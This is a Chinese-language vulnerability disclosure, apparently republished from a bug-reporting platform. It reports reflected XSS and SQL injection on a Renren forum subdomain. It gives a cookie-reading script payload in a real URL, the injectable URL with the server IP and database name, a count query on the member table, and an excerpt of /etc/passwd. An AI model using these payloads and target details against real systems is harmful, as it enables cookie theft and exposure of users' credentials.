人人网分站SQL注入+反射型xss

安全 数据安全
在人人某bbs,反射型跨站,可获取cookie。在sql注入时有多个注入点,information_schema.columns可用,注入很方便。

 1.人人某bbs。

2.反射型跨站,可获取cookie。

3.sql注入,多个注入点,information_schema.columns可用,注入很方便。

4.很多个数据表,select count(*) from XXX_用户表,结果:43998。

5.可读取系统文件,例如/etc/passwd(其他的路径没找到)。

起因是发现人人网某分站的phpinfo()(这个没有找到其他什么)

http://yxzb4.renren.com/index.php

结果发现,wooyun里面有提交了的,只是没处理。

http://www.wooyun.org/bugs/wooyun-2010-07040

结果偶然间,爬行到另外一个站,是一个游戏论坛。

http://yxzb.renren.com/bbs/

发现存在反射型xss,可获取cookie

http://yxzb.renren.com/bbs/viewthread.jsp

?extra=<script>document.write(document.cookie)</script>

&tid=9525

人人网分站SQL注入+反射型xss

其中几个页面都存在注入,其中一个注入信息:

Target:  http://yxzb.renren.com/bbs/faq.jsp?action=message&id=24

Host IP: 111.1.20.155

Web Server:  Apache-Coyote/1.1

DB Server:  MySQL >=5

Current DB:  jsprun

可查看系统信息:

人人网分站SQL注入+反射型xss

注入的信息:

好多个数据库:

人人网分站SQL注入+反射型xss

执行查询语句,查询用户,43998(网站上显示信息:主题: 31695, 帖子: 304040, 会员: 43998)

select count(*) from  jrun_members

人人网分站SQL注入+反射型xss

用户名,密码,邮箱,salt....

人人网分站SQL注入+反射型xss

读取/etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

...略

未测试是否可以拿到shell

责任编辑:蓝雨泪 来源: 2cto
相关推荐

2013-11-14 10:27:54

2019-03-25 07:27:14

XSS漏洞Ecshop

2019-02-25 09:20:53

2013-10-02 17:56:55

苏宁易购SA权限SQL注入

2023-03-10 19:36:47

2019-09-17 10:06:46

数据库程序员网络安全

2010-09-09 17:22:14

2015-10-26 16:01:15

2011-12-08 14:09:07

2013-11-27 17:12:27

2012-11-14 17:18:58

2011-12-08 16:18:40

2011-12-13 14:15:30

2010-12-20 16:04:30

2011-12-13 13:54:42

2013-09-03 10:22:02

人人网移动开发架构

2013-09-03 10:10:00

人人网移动开发架构

2013-01-05 14:51:34

JavaScriptjQuery面试

2011-07-21 09:25:41

2019-01-15 09:24:07

点赞
收藏

51CTO技术栈公众号